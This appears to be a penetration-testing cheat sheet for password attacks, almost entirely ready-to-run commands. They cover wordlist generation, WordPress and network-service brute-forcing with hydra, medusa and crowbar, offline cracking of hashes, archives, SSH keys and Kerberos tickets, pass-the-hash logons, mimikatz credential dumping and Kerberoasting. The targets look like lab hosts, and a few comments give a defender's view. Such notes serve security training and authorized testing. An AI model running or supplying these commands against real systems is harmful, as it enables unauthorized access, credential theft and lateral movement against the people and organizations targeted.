Passwords
Passwords 
Lists
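#Clean
# Strip comment lines and blank lines from every .txt wordlist under a directory (default: .).
# A single sed pass per file: comment lines are first emptied, then empty lines are deleted,
# which gives the same result as the original two passes.
# find -exec with a quoted path replaces `for i in $(find …)`, so file names containing
# spaces or glob characters are handled, and -type f skips any directory named *.txt
# (sed -i would fail on it).
clean_wordlists() {
  local dir="${1:-.}"
  find "$dir" -type f -name '*.txt' -exec sed -i -e 's/^#.*$//' -e '/^$/d' {} +
}
clean_wordlists .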
# cewl: build a wordlist from the text of a site; -m 6 keeps words of 6+ characters, -w writes the list to a file
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt # minimum word length 6
cewl https://esgeeks.com/ -n -e # e-mail addresses only (-n suppresses the word list, -e collects e-mails)
cewl https://esgeeks.com/ -c # count how often each word repeats
cewl https://esgeeks.com/ -d 3 # increase spider depth to 3 links from the start page
cewl http://testphp.vulnweb.com/ --with-numbers # also accept words that contain digits (alphanumeric)
# NOTE(review): this line names no target URL, and the auth type is Digest, not Basic
cewl --auth_type Digest --auth_user admin --auth_pass password -v # HTTP Digest auth
# crunch: every 8-character string matching the pattern — , = uppercase, @ = lowercase, ^ = symbol, % = digit
crunch 8 8 -t ,@@^^%%%
WpScan
# WPScan password attack against wp-login (-U user list, -P password list)
# NOTE: the -P path contains a shell glob; if it expands to more than one file the extra
# names reach wpscan as stray arguments — point it at a single file
wpscan --url http://$ip/ -U /tmp/users.txt -P /opt/wordlists/SecLists/Passwords/*/rockyou.txt --password-attack wp-login
# enumerate all plugins (ap), all themes (at), config backups (cb), database exports (dbe) and users (u)
wpscan --url sandbox.local --enumerate ap,at,cb,dbe,u
John The Ripper
John
#Mutated list
# apply John's rules to the cewl list and print the candidates (--stdout) instead of cracking
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
#NTLM
# --format=NT for NTLM hashes; --fork=8 splits the wordlist across 8 processes
john --wordlist=passfile.txt hash.txt --format=NT --fork=8
# print the hashes already cracked for this file (read from the pot file)
john --show hash.txt --format=NT
#RarFile
# the *2john helpers convert an encrypted container into John's hash format on stdout
rar2john flag.rar
# example rar2john output (a hash line, not a command)
flag.rar:$rar5$16$af331c442209e01c1d9abf8a9652c1d5$15$701e045b57d1c4c148e9738296956231$8$b51fc8fb1fa493f4
#ZipFile
zip2john flag.zip
#shadow
# merge the passwd and shadow files so John sees user names next to their hashes
unshadow passwd shadow > filetocrack
#Kirbi
# Kerberos ticket (.kirbi) -> John hash
kirbi2john.py file.kirbi > hash
#PFX
# PKCS#12 certificate store (.pfx) -> John hash
pfx2john file.pfx > hash
RSA Private Key
# encrypted OpenSSH private key -> John hash, then a dictionary attack on it
# (the leading "$ " is the shell prompt from the pasted session, not part of the command)
$ python ssh2john.py lala.key > hashlala
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashlala
Hydra
# Hydra online password guessing: -L/-l user list or single user, -P password list, -t parallel tasks,
# -f stop after the first valid pair on a host (-F: on any host), -v/-V verbosity (-V prints every attempt).
# Defender view: every attempt is a failed-logon event on the target, so a burst of failures from one
# source is the detection signal; lockout and rate limiting are the controls.
hydra -v -V -F -L users.txt -P rockyou.txt -t 30 ftp://192.168.1.135
hydra -l megan -P rockyou.txt ssh://10.10.10.60 -t 8
hydra -t 5 -V -f -L users.txt -e ns -P pasess.txt 192.168.1.135 mysql # -e ns: also try an empty password (n) and the user name as password (s)
hydra -L usernames.txt -P rockyou.txt -s 80 -f 192.168.1.135 http-get /sev-home # HTTP Basic auth on /sev-home; -s 80 = port
# form modules take "path:POST body with ^USER^/^PASS^ placeholders:failure marker" as one argument
hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
# F=... marks the failure string explicitly; -I ignores an existing restore file from an earlier run
hydra -l root@localhost -P /opt/SecLists/rockyou.txt 10.11.1.39 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
Medusa
#basic auth http
# -M http with -m DIR:/admin targets Basic auth on /admin; -h host, -u single user, -P password list
medusa -h 10.11.0.22 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
#SMB
# smbnt module: SMB logon attempts against a Windows host (each one is a logon-failure event there)
medusa -h 192.168.229.10 -u admin -P passfile.txt -M smbnt
Fcrackzip
# dictionary attack on a ZIP: -D dictionary mode with the list given via -p, -u unzips to verify each candidate, -v verbose
fcrackzip -v -u -D -p 'rockyou.txt' hammer.zip
Crowbar
# RDP password guessing: -b protocol, -s target as CIDR, -u user, -C password file, -n 1 thread
crowbar -b rdp -s 192.168.229.10/32 -u admin -C passfile.txt -n 1
PassTheHash
#PTH
# pth-winexe takes LMhash:NThash; aad3b435b51404eeaad3b435b51404ee is the fixed hash of an empty LM password.
# Defender view: an NT hash is password-equivalent for NTLM authentication, so the controls are
# credential hygiene (no shared local-admin password across hosts, LAPS, limiting where admins log on);
# the tools below perform ordinary network logons, so the signal is which account logs on from where.
pth-winexe -U admin%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.229.10 cmd
#Impacket
# -hashes LM:NT, LM part left empty
wmiexec.py -hashes :2892d26cdf84d7a70e2eb3b9f05c425e administrator@192.168.229.10
#CrackMapExec
# tries the NT hash against every host in the /24
crackmapexec smb 192.168.229.10/24 -u offsec -H 2892d26cdf84d7a70e2eb3b9f05c425e
#EvilWinRM
# WinRM (PowerShell remoting) shell authenticated with the NT hash
evil-winrm -i 192.168.229.10 -u offsec -H 2892d26cdf84d7a70e2eb3b9f05c425e
mimikatz
Dump SAM
privilege::debug
token::elevate
lsadump::sam
lsadump::lsa /patch
Logged Users
privilege::debug
sekurlsa::logonpasswords
Kerberos
sekurlsa::tickets
kerberos::list /export
Overpass the hash
sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:2892d26cdf84d7a70e2eb3b9f05c425e /run:PowerShell.exe
Without mimikatz
#Invoke-Kerberoast
# requests a service ticket for every account that has an SPN and writes the hashes in hashcat format
# Defender view: the ticket requests are logged on the domain controller (service-ticket request audit
# events), and a long random password or a gMSA on the SPN account makes the ticket impractical to crack.
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt
Tgsrepcrack
#Request a service ticket for the SPN HTTP/CorpWebServer.corp.com through the .NET Kerberos token class
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'
#crack
# offline dictionary attack on an exported .kirbi service ticket (see kerberos::list /export above)
tgsrepcrack.py wordlist.txt file.kirbi